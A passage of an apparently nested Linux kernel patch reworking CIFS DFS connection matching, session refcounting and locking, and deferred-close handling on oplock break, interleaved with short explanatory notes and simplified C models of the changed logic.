+-	if (dfs_super_cmp) {
+-		if (!ctx->source || !server->origin_fullpath ||
+-		    !dfs_src_pathname_equal(server->origin_fullpath, ctx->source))
+-			return 0;
+-	} else {
+-		/* Skip addr, hostname and port matching for DFS connections */
+-		if (server->leaf_fullpath) {
++	if (!ctx->nodfs) {
++		if (ctx->source && server->origin_fullpath) {
++			if (!dfs_src_pathname_equal(ctx->source,
++						    server->origin_fullpath))
++				return 0;
++		} else if (server->leaf_fullpath) {
+ 			if (!ctx->leaf_fullpath ||
+-			    strcasecmp(server->leaf_fullpath, ctx->leaf_fullpath))
++			    strcasecmp(server->leaf_fullpath,
++				       ctx->leaf_fullpath))
+ 				return 0;
+-		} else if (strcasecmp(server->hostname, ctx->server_hostname) ||
+-			   !match_server_address(server, addr) ||
+-			   !match_port(server, addr)) {
++		} else if (ctx->leaf_fullpath) {
+ 			return 0;
+ 		}
++	} else if (server->origin_fullpath || server->leaf_fullpath) {
++		return 0;
+ 	}
+ 
++	/*
++	 * Match for a regular connection (address/hostname/port) which has no
++	 * DFS referrals set.
++	 */
++	if (!server->origin_fullpath && !server->leaf_fullpath &&
++	    (strcasecmp(server->hostname, ctx->server_hostname) ||
++	     !match_server_address(server, addr) ||
++	     !match_port(server, addr)))
++		return 0;
++
+ 	if (!match_security(server, ctx))
+ 		return 0;
+ 
+@@ -1521,7 +1523,7 @@ cifs_find_tcp_session(struct smb3_fs_context *ctx)
+ 		 * Skip ses channels since they're only handled in lower layers
+ 		 * (e.g. cifs_send_recv).
+ 		 */
+-		if (CIFS_SERVER_IS_CHAN(server) || !match_server(server, ctx, false)) {
++		if (CIFS_SERVER_IS_CHAN(server) || !match_server(server, ctx)) {
+ 			spin_unlock(&server->srv_lock);
+ 			continue;
+ 		}
+@@ -1622,7 +1624,6 @@ cifs_get_tcp_session(struct smb3_fs_context *ctx,
+ 			rc = -ENOMEM;
+ 			goto out_err;
+ 		}
+-		tcp_ses->current_fullpath = tcp_ses->leaf_fullpath;
+ 	}
+ 
+ 	if (ctx->nosharesock)
+@@ -1859,7 +1860,9 @@ cifs_setup_ipc(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+ 	if (tcon == NULL)
+ 		return -ENOMEM;
+ 
++	spin_lock(&server->srv_lock);
+ 	scnprintf(unc, sizeof(unc), "\\\\%s\\IPC$", server->hostname);
++	spin_unlock(&server->srv_lock);
+ 
+ 	xid = get_xid();
+ 	tcon->ses = ses;
+@@ -1912,7 +1915,7 @@ cifs_free_ipc(struct cifs_ses *ses)
+ static struct cifs_ses *
+ cifs_find_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+ {
+-	struct cifs_ses *ses;
++	struct cifs_ses *ses, *ret = NULL;
+ 
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
+@@ -1922,23 +1925,22 @@ cifs_find_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+ 			continue;
+ 		}
+ 		spin_lock(&ses->chan_lock);
+-		if (!match_session(ses, ctx)) {
++		if (match_session(ses, ctx)) {
+ 			spin_unlock(&ses->chan_lock);
+ 			spin_unlock(&ses->ses_lock);
+-			continue;
++			ret = ses;
++			break;
+ 		}
+ 		spin_unlock(&ses->chan_lock);
+ 		spin_unlock(&ses->ses_lock);
+-
+-		++ses->ses_count;
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		return ses;
+ 	}
++	if (ret)
++		cifs_smb_ses_inc_refcount(ret);
+ 	spin_unlock(&cifs_tcp_ses_lock);
+-	return NULL;
++	return ret;
+ }
+ 
+-void cifs_put_smb_ses(struct cifs_ses *ses)
++void __cifs_put_smb_ses(struct cifs_ses *ses)
+ {
+ 	unsigned int rc, xid;
+ 	unsigned int chan_count;
+@@ -2289,6 +2291,8 @@ cifs_get_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+ 	 */
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	ses->dfs_root_ses = ctx->dfs_root_ses;
++	if (ses->dfs_root_ses)
++		ses->dfs_root_ses->ses_count++;
+ 	list_add(&ses->smb_ses_list, &server->smb_ses_list);
+ 	spin_unlock(&cifs_tcp_ses_lock);
+ 
+@@ -2305,12 +2309,15 @@ get_ses_fail:
+ }
+ 
+ /* this function must be called with tc_lock held */
+-static int match_tcon(struct cifs_tcon *tcon, struct smb3_fs_context *ctx, bool dfs_super_cmp)
++static int match_tcon(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
+ {
++	struct TCP_Server_Info *server = tcon->ses->server;
++
+ 	if (tcon->status == TID_EXITING)
+ 		return 0;
+-	/* Skip UNC validation when matching DFS superblocks */
+-	if (!dfs_super_cmp && strncmp(tcon->tree_name, ctx->UNC, MAX_TREE_SIZE))
++	/* Skip UNC validation when matching DFS connections or superblocks */
++	if (!server->origin_fullpath && !server->leaf_fullpath &&
++	    strncmp(tcon->tree_name, ctx->UNC, MAX_TREE_SIZE))
+ 		return 0;
+ 	if (tcon->seal != ctx->seal)
+ 		return 0;
+@@ -2333,7 +2340,7 @@ cifs_find_tcon(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+ 		spin_lock(&tcon->tc_lock);
+-		if (!match_tcon(tcon, ctx, false)) {
++		if (!match_tcon(tcon, ctx)) {
+ 			spin_unlock(&tcon->tc_lock);
+ 			continue;
+ 		}
+@@ -2704,9 +2711,11 @@ compare_mount_options(struct super_block *sb, struct cifs_mnt_data *mnt_data)
+ 	return 1;
+ }
+ 
+-static int
+-match_prepath(struct super_block *sb, struct cifs_mnt_data *mnt_data)
++static int match_prepath(struct super_block *sb,
++			 struct TCP_Server_Info *server,
++			 struct cifs_mnt_data *mnt_data)
+ {
++	struct smb3_fs_context *ctx = mnt_data->ctx;
+ 	struct cifs_sb_info *old = CIFS_SB(sb);
+ 	struct cifs_sb_info *new = mnt_data->cifs_sb;
+ 	bool old_set = (old->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH) &&
+@@ -2714,6 +2723,10 @@ match_prepath(struct super_block *sb, struct cifs_mnt_data *mnt_data)
+ 	bool new_set = (new->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH) &&
+ 		new->prepath;
+ 
++	if (server->origin_fullpath &&
++	    dfs_src_pathname_equal(server->origin_fullpath, ctx->source))
++		return 1;
++
+ 	if (old_set && new_set && !strcmp(new->prepath, old->prepath))
+ 		return 1;
+ 	else if (!old_set && !new_set)
+@@ -2732,7 +2745,6 @@ cifs_match_super(struct super_block *sb, void *data)
+ 	struct cifs_ses *ses;
+ 	struct cifs_tcon *tcon;
+ 	struct tcon_link *tlink;
+-	bool dfs_super_cmp;
+ 	int rc = 0;
+ 
+ 	spin_lock(&cifs_tcp_ses_lock);
+@@ -2747,18 +2759,16 @@ cifs_match_super(struct super_block *sb, void *data)
+ 	ses = tcon->ses;
+ 	tcp_srv = ses->server;
+ 
+-	dfs_super_cmp = IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) && tcp_srv->origin_fullpath;
+-
+ 	ctx = mnt_data->ctx;
+ 
+ 	spin_lock(&tcp_srv->srv_lock);
+ 	spin_lock(&ses->ses_lock);
+ 	spin_lock(&ses->chan_lock);
+ 	spin_lock(&tcon->tc_lock);
+-	if (!match_server(tcp_srv, ctx, dfs_super_cmp) ||
++	if (!match_server(tcp_srv, ctx) ||
+ 	    !match_session(ses, ctx) ||
+-	    !match_tcon(tcon, ctx, dfs_super_cmp) ||
+-	    !match_prepath(sb, mnt_data)) {
++	    !match_tcon(tcon, ctx) ||
++	    !match_prepath(sb, tcp_srv, mnt_data)) {
+ 		rc = 0;
+ 		goto out;
+ 	}
+@@ -3503,8 +3513,6 @@ out:
+ 
+ error:
+ 	dfs_put_root_smb_sessions(&mnt_ctx.dfs_ses_list);
+-	kfree(mnt_ctx.origin_fullpath);
+-	kfree(mnt_ctx.leaf_fullpath);
+ 	cifs_mount_put_conns(&mnt_ctx);
+ 	return rc;
+ }
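
The reworked match_server() reduces DFS matching to a small decision table: under 'nodfs' only referral-free connections match; an existing DFS tcon matches by origin_fullpath; a DFS root server connection matches by leaf_fullpath; and a bare ctx->leaf_fullpath means a new connection is needed. A boiled-down predicate capturing that table (simplified: strcasecmp() stands in for the separator-insensitive dfs_src_pathname_equal() used for the source comparison):

#include <stdbool.h>
#include <stdio.h>
#include <strings.h>

/* Simplified stand-ins for the fields match_server() now consults. */
struct srv { const char *origin_fullpath, *leaf_fullpath; };
struct ctx { const char *source, *leaf_fullpath; bool nodfs; };

static bool match_dfs_paths(const struct srv *s, const struct ctx *c)
{
	if (c->nodfs)		/* 'nodfs': only plain connections match */
		return !s->origin_fullpath && !s->leaf_fullpath;
	if (c->source && s->origin_fullpath)	/* existing DFS tcon */
		return !strcasecmp(c->source, s->origin_fullpath);
	if (s->leaf_fullpath)	/* DFS root server connection */
		return c->leaf_fullpath &&
		       !strcasecmp(s->leaf_fullpath, c->leaf_fullpath);
	return !c->leaf_fullpath;	/* otherwise: new DFS connection */
}

int main(void)
{
	struct srv dfs = { .origin_fullpath = "\\\\srv\\dfs" };
	struct ctx plain = { .nodfs = true };
	struct ctx same = { .source = "\\\\SRV\\dfs" };

	printf("nodfs vs dfs server: %d\n", match_dfs_paths(&dfs, &plain));
	printf("same source:         %d\n", match_dfs_paths(&dfs, &same));
	return 0;
}
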
+diff --git a/fs/cifs/dfs.c b/fs/cifs/dfs.c
+index c8bda52fa096c..4c392bde24066 100644
+--- a/fs/cifs/dfs.c
++++ b/fs/cifs/dfs.c
+@@ -99,7 +99,7 @@ static int get_session(struct cifs_mount_ctx *mnt_ctx, const char *full_path)
+ 	return rc;
+ }
+ 
+-static int get_root_smb_session(struct cifs_mount_ctx *mnt_ctx)
++static int add_root_smb_session(struct cifs_mount_ctx *mnt_ctx)
+ {
+ 	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
+ 	struct dfs_root_ses *root_ses;
+@@ -127,7 +127,7 @@ static int get_dfs_conn(struct cifs_mount_ctx *mnt_ctx, const char *ref_path, co
+ {
+ 	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
+ 	struct dfs_info3_param ref = {};
+-	bool is_refsrv = false;
++	bool is_refsrv;
+ 	int rc, rc2;
+ 
+ 	rc = dfs_cache_get_tgt_referral(ref_path + 1, tit, &ref);
+@@ -158,7 +158,7 @@ static int get_dfs_conn(struct cifs_mount_ctx *mnt_ctx, const char *ref_path, co
+ 	}
+ 
+ 	if (rc == -EREMOTE && is_refsrv) {
+-		rc2 = get_root_smb_session(mnt_ctx);
++		rc2 = add_root_smb_session(mnt_ctx);
+ 		if (rc2)
+ 			rc = rc2;
+ 	}
+@@ -248,11 +248,12 @@ static int __dfs_mount_share(struct cifs_mount_ctx *mnt_ctx)
+ 		tcon = mnt_ctx->tcon;
+ 
+ 		mutex_lock(&server->refpath_lock);
++		spin_lock(&server->srv_lock);
+ 		if (!server->origin_fullpath) {
+ 			server->origin_fullpath = origin_fullpath;
+-			server->current_fullpath = server->leaf_fullpath;
+ 			origin_fullpath = NULL;
+ 		}
++		spin_unlock(&server->srv_lock);
+ 		mutex_unlock(&server->refpath_lock);
+ 
+ 		if (list_empty(&tcon->dfs_ses_list)) {
+@@ -272,15 +273,21 @@ out:
+ 
+ int dfs_mount_share(struct cifs_mount_ctx *mnt_ctx, bool *isdfs)
+ {
+-	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
+ 	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
++	struct cifs_ses *ses;
++	char *source = ctx->source;
++	bool nodfs = ctx->nodfs;
+ 	int rc;
+ 
+ 	*isdfs = false;
+-
++	/*
++	 * Temporarily set @ctx->source to NULL as we're not matching DFS
++	 * superblocks yet.  See cifs_match_super() and match_server().
++	 */
++	ctx->source = NULL;
+ 	rc = get_session(mnt_ctx, NULL);
+ 	if (rc)
+-		return rc;
++		goto out;
++
+ 	ctx->dfs_root_ses = mnt_ctx->ses;
+ 	/*
+ 	 * If called with 'nodfs' mount option, then skip DFS resolving.  Otherwise unconditionally
+@@ -289,23 +296,41 @@ int dfs_mount_share(struct cifs_mount_ctx *mnt_ctx, bool *isdfs)
+ 	 * Skip prefix path to provide support for DFS referrals from w2k8 servers which don't seem
+ 	 * to respond with PATH_NOT_COVERED to requests that include the prefix.
+ 	 */
+-	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS) ||
+-	    dfs_get_referral(mnt_ctx, ctx->UNC + 1, NULL, NULL)) {
++	if (!nodfs) {
++		rc = dfs_get_referral(mnt_ctx, ctx->UNC + 1, NULL, NULL);
++		if (rc) {
++			if (rc != -ENOENT && rc != -EOPNOTSUPP)
++				goto out;
++			nodfs = true;
++		}
++	}
++	if (nodfs) {
+ 		rc = cifs_mount_get_tcon(mnt_ctx);
+-		if (rc)
+-			return rc;
+-
+-		rc = cifs_is_path_remote(mnt_ctx);
+-		if (!rc || rc != -EREMOTE)
+-			return rc;
++		if (!rc)
++			rc = cifs_is_path_remote(mnt_ctx);
++		goto out;
+ 	}
+ 
+ 	*isdfs = true;
+-	rc = get_root_smb_session(mnt_ctx);
+-	if (rc)
+-		return rc;
+-
+-	return __dfs_mount_share(mnt_ctx);
++	/*
++	 * Prevent the DFS root session from being put in the first call to
++	 * cifs_mount_put_conns().  If another DFS root server was not found
++	 * while chasing the referrals (@ctx->dfs_root_ses == @ses), then we
++	 * can safely put the extra refcount of @ses.
++	 */
++	ses = mnt_ctx->ses;
++	mnt_ctx->ses = NULL;
++	mnt_ctx->server = NULL;
++	rc = __dfs_mount_share(mnt_ctx);
++	if (ses == ctx->dfs_root_ses)
++		cifs_put_smb_ses(ses);
++out:
++	/*
++	 * Restore previous value of @ctx->source so DFS superblock can be
++	 * matched in cifs_match_super().
++	 */
++	ctx->source = source;
++	return rc;
+ }
+ 
+ /* Update dfs referral path of superblock */
+@@ -342,10 +367,11 @@ static int update_server_fullpath(struct TCP_Server_Info *server, struct cifs_sb
+ 		rc = PTR_ERR(npath);
+ 	} else {
+ 		mutex_lock(&server->refpath_lock);
++		spin_lock(&server->srv_lock);
+ 		kfree(server->leaf_fullpath);
+ 		server->leaf_fullpath = npath;
++		spin_unlock(&server->srv_lock);
+ 		mutex_unlock(&server->refpath_lock);
+-		server->current_fullpath = server->leaf_fullpath;
+ 	}
+ 	return rc;
+ }
+@@ -374,6 +400,54 @@ static int target_share_matches_server(struct TCP_Server_Info *server, char *sha
+ 	return rc;
+ }
+ 
++static void __tree_connect_ipc(const unsigned int xid, char *tree,
++			       struct cifs_sb_info *cifs_sb,
++			       struct cifs_ses *ses)
++{
++	struct TCP_Server_Info *server = ses->server;
++	struct cifs_tcon *tcon = ses->tcon_ipc;
++	int rc;
++
++	spin_lock(&ses->ses_lock);
++	spin_lock(&ses->chan_lock);
++	if (cifs_chan_needs_reconnect(ses, server) ||
++	    ses->ses_status != SES_GOOD) {
++		spin_unlock(&ses->chan_lock);
++		spin_unlock(&ses->ses_lock);
++		cifs_server_dbg(FYI, "%s: skipping ipc reconnect due to disconnected ses\n",
++				__func__);
++		return;
++	}
++	spin_unlock(&ses->chan_lock);
++	spin_unlock(&ses->ses_lock);
++
++	cifs_server_lock(server);
++	scnprintf(tree, MAX_TREE_SIZE, "\\\\%s\\IPC$", server->hostname);
++	cifs_server_unlock(server);
++
++	rc = server->ops->tree_connect(xid, ses, tree, tcon,
++				       cifs_sb->local_nls);
++	cifs_server_dbg(FYI, "%s: tree_reconnect %s: %d\n", __func__, tree, rc);
++	spin_lock(&tcon->tc_lock);
++	if (rc) {
++		tcon->status = TID_NEED_TCON;
++	} else {
++		tcon->status = TID_GOOD;
++		tcon->need_reconnect = false;
++	}
++	spin_unlock(&tcon->tc_lock);
++}
++
++static void tree_connect_ipc(const unsigned int xid, char *tree,
++			     struct cifs_sb_info *cifs_sb,
++			     struct cifs_tcon *tcon)
++{
++	struct cifs_ses *ses = tcon->ses;
++
++	__tree_connect_ipc(xid, tree, cifs_sb, ses);
++	__tree_connect_ipc(xid, tree, cifs_sb, CIFS_DFS_ROOT_SES(ses));
++}
++
+ static int __tree_connect_dfs_target(const unsigned int xid, struct cifs_tcon *tcon,
+ 				     struct cifs_sb_info *cifs_sb, char *tree, bool islink,
+ 				     struct dfs_cache_tgt_list *tl)
+@@ -382,7 +456,6 @@ static int __tree_connect_dfs_target(const unsigned int xid, struct cifs_tcon *t
+ 	struct TCP_Server_Info *server = tcon->ses->server;
+ 	const struct smb_version_operations *ops = server->ops;
+ 	struct cifs_ses *root_ses = CIFS_DFS_ROOT_SES(tcon->ses);
+-	struct cifs_tcon *ipc = root_ses->tcon_ipc;
+ 	char *share = NULL, *prefix = NULL;
+ 	struct dfs_cache_tgt_iterator *tit;
+ 	bool target_match;
+@@ -403,7 +476,7 @@ static int __tree_connect_dfs_target(const unsigned int xid, struct cifs_tcon *t
+ 		share = prefix = NULL;
+ 
+ 		/* Check if share matches with tcp ses */
+-		rc = dfs_cache_get_tgt_share(server->current_fullpath + 1, tit, &share, &prefix);
++		rc = dfs_cache_get_tgt_share(server->leaf_fullpath + 1, tit, &share, &prefix);
+ 		if (rc) {
+ 			cifs_dbg(VFS, "%s: failed to parse target share: %d\n", __func__, rc);
+ 			break;
+@@ -417,19 +490,15 @@ static int __tree_connect_dfs_target(const unsigned int xid, struct cifs_tcon *t
+ 			continue;
+ 		}
+ 
+-		dfs_cache_noreq_update_tgthint(server->current_fullpath + 1, tit);
+-
+-		if (ipc->need_reconnect) {
+-			scnprintf(tree, MAX_TREE_SIZE, "\\\\%s\\IPC$", server->hostname);
+-			rc = ops->tree_connect(xid, ipc->ses, tree, ipc, cifs_sb->local_nls);
+-			cifs_dbg(FYI, "%s: reconnect ipc: %d\n", __func__, rc);
+-		}
++		dfs_cache_noreq_update_tgthint(server->leaf_fullpath + 1, tit);
++		tree_connect_ipc(xid, tree, cifs_sb, tcon);
+ 
+ 		scnprintf(tree, MAX_TREE_SIZE, "\\%s", share);
+ 		if (!islink) {
+ 			rc = ops->tree_connect(xid, tcon->ses, tree, tcon, cifs_sb->local_nls);
+ 			break;
+ 		}
++
+ 		/*
+ 		 * If no dfs referrals were returned from link target, then just do a TREE_CONNECT
+ 		 * to it.  Otherwise, cache the dfs referral and then mark current tcp ses for
+@@ -535,8 +604,8 @@ int cifs_tree_connect(const unsigned int xid, struct cifs_tcon *tcon, const stru
+ 	cifs_sb = CIFS_SB(sb);
+ 
+ 	/* If it is not dfs or there was no cached dfs referral, then reconnect to same share */
+-	if (!server->current_fullpath ||
+-	    dfs_cache_noreq_find(server->current_fullpath + 1, &ref, &tl)) {
++	if (!server->leaf_fullpath ||
++	    dfs_cache_noreq_find(server->leaf_fullpath + 1, &ref, &tl)) {
+ 		rc = ops->tree_connect(xid, tcon->ses, tcon->tree_name, tcon, cifs_sb->local_nls);
+ 		goto out;
+ 	}
+diff --git a/fs/cifs/dfs.h b/fs/cifs/dfs.h
+index 0b8cbf721fff6..1c90df5ecfbda 100644
+--- a/fs/cifs/dfs.h
++++ b/fs/cifs/dfs.h
+@@ -43,8 +43,12 @@ static inline char *dfs_get_automount_devname(struct dentry *dentry, void *page)
+ 	size_t len;
+ 	char *s;
+ 
+-	if (unlikely(!server->origin_fullpath))
++	spin_lock(&server->srv_lock);
++	if (unlikely(!server->origin_fullpath)) {
++		spin_unlock(&server->srv_lock);
+ 		return ERR_PTR(-EREMOTE);
++	}
++	spin_unlock(&server->srv_lock);
+ 
+ 	s = dentry_path_raw(dentry, page, PATH_MAX);
+ 	if (IS_ERR(s))
+@@ -53,13 +57,18 @@ static inline char *dfs_get_automount_devname(struct dentry *dentry, void *page)
+ 	if (!s[1])
+ 		s++;
+ 
++	spin_lock(&server->srv_lock);
+ 	len = strlen(server->origin_fullpath);
+-	if (s < (char *)page + len)
++	if (s < (char *)page + len) {
++		spin_unlock(&server->srv_lock);
+ 		return ERR_PTR(-ENAMETOOLONG);
++	}
+ 
+ 	s -= len;
+ 	memcpy(s, server->origin_fullpath, len);
++	spin_unlock(&server->srv_lock);
+ 	convert_delimiter(s, '/');
++
+ 	return s;
+ }
+ 
+diff --git a/fs/cifs/dfs_cache.c b/fs/cifs/dfs_cache.c
+index 1c59811bfa73a..9ccaa0c7ac943 100644
+--- a/fs/cifs/dfs_cache.c
++++ b/fs/cifs/dfs_cache.c
+@@ -1278,8 +1278,12 @@ static void refresh_cache_worker(struct work_struct *work)
+ 
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
+-		if (!server->leaf_fullpath)
++		spin_lock(&server->srv_lock);
++		if (!server->leaf_fullpath) {
++			spin_unlock(&server->srv_lock);
+ 			continue;
++		}
++		spin_unlock(&server->srv_lock);
+ 
+ 		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
+ 			if (ses->tcon_ipc) {
+diff --git a/fs/cifs/file.c b/fs/cifs/file.c
+index a53ddc81b698c..bef7c335ccc6e 100644
+--- a/fs/cifs/file.c
++++ b/fs/cifs/file.c
+@@ -5096,6 +5096,8 @@ void cifs_oplock_break(struct work_struct *work)
+ 	struct TCP_Server_Info *server = tcon->ses->server;
+ 	int rc = 0;
+ 	bool purge_cache = false;
++	struct cifs_deferred_close *dclose;
++	bool is_deferred = false;
+ 
+ 	wait_on_bit(&cinode->flags, CIFS_INODE_PENDING_WRITERS,
+ 			TASK_UNINTERRUPTIBLE);
+@@ -5131,6 +5133,20 @@ void cifs_oplock_break(struct work_struct *work)
+ 		cifs_dbg(VFS, "Push locks rc = %d\n", rc);
+ 
+ oplock_break_ack:
++	/*
++	 * When oplock break is received and there are no active
++	 * file handles but cached, then schedule deferred close immediately.
++	 * So, new open will not use cached handle.
++	 */
++	spin_lock(&CIFS_I(inode)->deferred_lock);
++	is_deferred = cifs_is_deferred_close(cfile, &dclose);
++	spin_unlock(&CIFS_I(inode)->deferred_lock);
++
++	if (!CIFS_CACHE_HANDLE(cinode) && is_deferred &&
++			cfile->deferred_close_scheduled && delayed_work_pending(&cfile->deferred)) {
++		cifs_close_deferred_file(cinode);
++	}
++
+ 	/*
+ 	 * releasing stale oplock after recent reconnect of smb session using
+ 	 * a now incorrect file handle is not a data integrity issue but do
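
The oplock-break hunk closes a window where a freshly broken oplock could race with a still-queued deferred close: if the handle is no longer cacheable but a deferred close is pending, it is executed immediately so a new open cannot reuse the stale handle. Reduced to its decision logic (boolean model, illustration only):

#include <stdbool.h>
#include <stdio.h>

struct cfile {
	bool handle_cached;		/* CIFS_CACHE_HANDLE() analogue */
	bool deferred_close_pending;	/* delayed work still queued */
};

/* On oplock break, close cached-but-unused handles right away so a
 * subsequent open goes to the server instead of reusing them.
 */
static void oplock_break(struct cfile *f)
{
	if (!f->handle_cached && f->deferred_close_pending) {
		f->deferred_close_pending = false;
		printf("deferred close executed immediately\n");
	}
}

int main(void)
{
	struct cfile f = { .handle_cached = false,
			   .deferred_close_pending = true };

	oplock_break(&f);
	return 0;
}
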
+diff --git a/fs/cifs/ioctl.c b/fs/cifs/ioctl.c
+index 6419ec47c2a85..cb3be58cd55eb 100644
+--- a/fs/cifs/ioctl.c
++++ b/fs/cifs/ioctl.c
+@@ -239,7 +239,7 @@ static int cifs_dump_full_key(struct cifs_tcon *tcon, struct smb3_full_key_debug
+ 					 * section, we need to make sure it won't be released
+ 					 * so increment its refcount
+ 					 */
+-					ses->ses_count++;
++					cifs_smb_ses_inc_refcount(ses);
+ 					found = true;
+ 					goto search_end;
+ 				}
+diff --git a/fs/cifs/misc.c b/fs/cifs/misc.c
+index 2fae6b08314d9..ee0a3c3f6b1d6 100644
+--- a/fs/cifs/misc.c
++++ b/fs/cifs/misc.c
+@@ -749,7 +749,9 @@ cifs_close_deferred_file(struct cifsInodeInfo *cifs_inode)
+ 	list_for_each_entry(cfile, &cifs_inode->openFileList, flist) {
+ 		if (delayed_work_pending(&cfile->deferred)) {
+ 			if (cancel_delayed_work(&cfile->deferred)) {
++				spin_lock(&cifs_inode->deferred_lock);
+ 				cifs_del_deferred_close(cfile);
++				spin_unlock(&cifs_inode->deferred_lock);
+ 
+ 				tmp_list = kmalloc(sizeof(struct file_list), GFP_ATOMIC);
+ 				if (tmp_list == NULL)
+@@ -762,7 +764,7 @@ cifs_close_deferred_file(struct cifsInodeInfo *cifs_inode)
+ 	spin_unlock(&cifs_inode->open_file_lock);
+ 
+ 	list_for_each_entry_safe(tmp_list, tmp_next_list, &file_head, list) {
+-		_cifsFileInfo_put(tmp_list->cfile, true, false);
++		_cifsFileInfo_put(tmp_list->cfile, false, false);
+ 		list_del(&tmp_list->list);
+ 		kfree(tmp_list);
+ 	}
+@@ -780,7 +782,9 @@ cifs_close_all_deferred_files(struct cifs_tcon *tcon)
+ 	list_for_each_entry(cfile, &tcon->openFileList, tlist) {
+ 		if (delayed_work_pending(&cfile->deferred)) {
+ 			if (cancel_delayed_work(&cfile->deferred)) {
++				spin_lock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+ 				cifs_del_deferred_close(cfile);
++				spin_unlock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+ 
+ 				tmp_list = kmalloc(sizeof(struct file_list), GFP_ATOMIC);
+ 				if (tmp_list == NULL)
+@@ -815,7 +819,9 @@ cifs_close_deferred_file_under_dentry(struct cifs_tcon *tcon, const char *path)
+ 		if (strstr(full_path, path)) {
+ 			if (delayed_work_pending(&cfile->deferred)) {
+ 				if (cancel_delayed_work(&cfile->deferred)) {
++					spin_lock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+ 					cifs_del_deferred_close(cfile);
++					spin_unlock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+ 
+ 					tmp_list = kmalloc(sizeof(struct file_list), GFP_ATOMIC);
+ 					if (tmp_list == NULL)
+diff --git a/fs/cifs/sess.c b/fs/cifs/sess.c
+index c47b254f0d1e2..81be17845072a 100644
+--- a/fs/cifs/sess.c
++++ b/fs/cifs/sess.c
+@@ -159,6 +159,7 @@ cifs_chan_is_iface_active(struct cifs_ses *ses,
+ /* returns number of channels added */
+ int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses)
+ {
++	struct TCP_Server_Info *server = ses->server;
+ 	int old_chan_count, new_chan_count;
+ 	int left;
+ 	int rc = 0;
+@@ -178,16 +179,16 @@ int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses)
+ 		return 0;
+ 	}
+ 
+-	if (ses->server->dialect < SMB30_PROT_ID) {
++	if (server->dialect < SMB30_PROT_ID) {
+ 		spin_unlock(&ses->chan_lock);
+ 		cifs_dbg(VFS, "multichannel is not supported on this protocol version, use 3.0 or above\n");
+ 		return 0;
+ 	}
+ 
+-	if (!(ses->server->capabilities & SMB2_GLOBAL_CAP_MULTI_CHANNEL)) {
++	if (!(server->capabilities & SMB2_GLOBAL_CAP_MULTI_CHANNEL)) {
+ 		ses->chan_max = 1;
+ 		spin_unlock(&ses->chan_lock);
+-		cifs_dbg(VFS, "server %s does not support multichannel\n", ses->server->hostname);
++		cifs_server_dbg(VFS, "no multichannel support\n");
+ 		return 0;
+ 	}
+ 	spin_unlock(&ses->chan_lock);
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index ab59faf8a06a7..0550be60dce44 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -175,8 +175,17 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 		}
+ 	}
+ 	spin_unlock(&tcon->tc_lock);
+-	if ((!tcon->ses) || (tcon->ses->ses_status == SES_EXITING) ||
+-	    (!tcon->ses->server) || !server)
++
++	ses = tcon->ses;
++	if (!ses)
++		return -EIO;
++	spin_lock(&ses->ses_lock);
++	if (ses->ses_status == SES_EXITING) {
++		spin_unlock(&ses->ses_lock);
++		return -EIO;
++	}
++	spin_unlock(&ses->ses_lock);
++	if (!ses->server || !server)
+ 		return -EIO;
+ 
+ 	spin_lock(&server->srv_lock);
+@@ -204,8 +213,6 @@ again:
+ 	if (rc)
+ 		return rc;
+ 
+-	ses = tcon->ses;
+-
+ 	spin_lock(&ses->chan_lock);
+ 	if (!cifs_chan_needs_reconnect(ses, server) && !tcon->need_reconnect) {
+ 		spin_unlock(&ses->chan_lock);
+@@ -3851,7 +3858,7 @@ void smb2_reconnect_server(struct work_struct *work)
+ 		if (ses->tcon_ipc && ses->tcon_ipc->need_reconnect) {
+ 			list_add_tail(&ses->tcon_ipc->rlist, &tmp_list);
+ 			tcon_selected = tcon_exist = true;
+-			ses->ses_count++;
++			cifs_smb_ses_inc_refcount(ses);
+ 		}
+ 		/*
+ 		 * handle the case where channel needs to reconnect
+@@ -3862,7 +3869,7 @@ void smb2_reconnect_server(struct work_struct *work)
+ 		if (!tcon_selected && cifs_chan_needs_reconnect(ses, server)) {
+ 			list_add_tail(&ses->rlist, &tmp_ses_list);
+ 			ses_exist = true;
+-			ses->ses_count++;
++			cifs_smb_ses_inc_refcount(ses);
+ 		}
+ 		spin_unlock(&ses->chan_lock);
+ 	}
+diff --git a/fs/dlm/ast.c b/fs/dlm/ast.c
+index 26fef9945cc90..39805aea33367 100644
+--- a/fs/dlm/ast.c
++++ b/fs/dlm/ast.c
+@@ -45,7 +45,7 @@ void dlm_purge_lkb_callbacks(struct dlm_lkb *lkb)
+ 		kref_put(&cb->ref, dlm_release_callback);
+ 	}
+ 
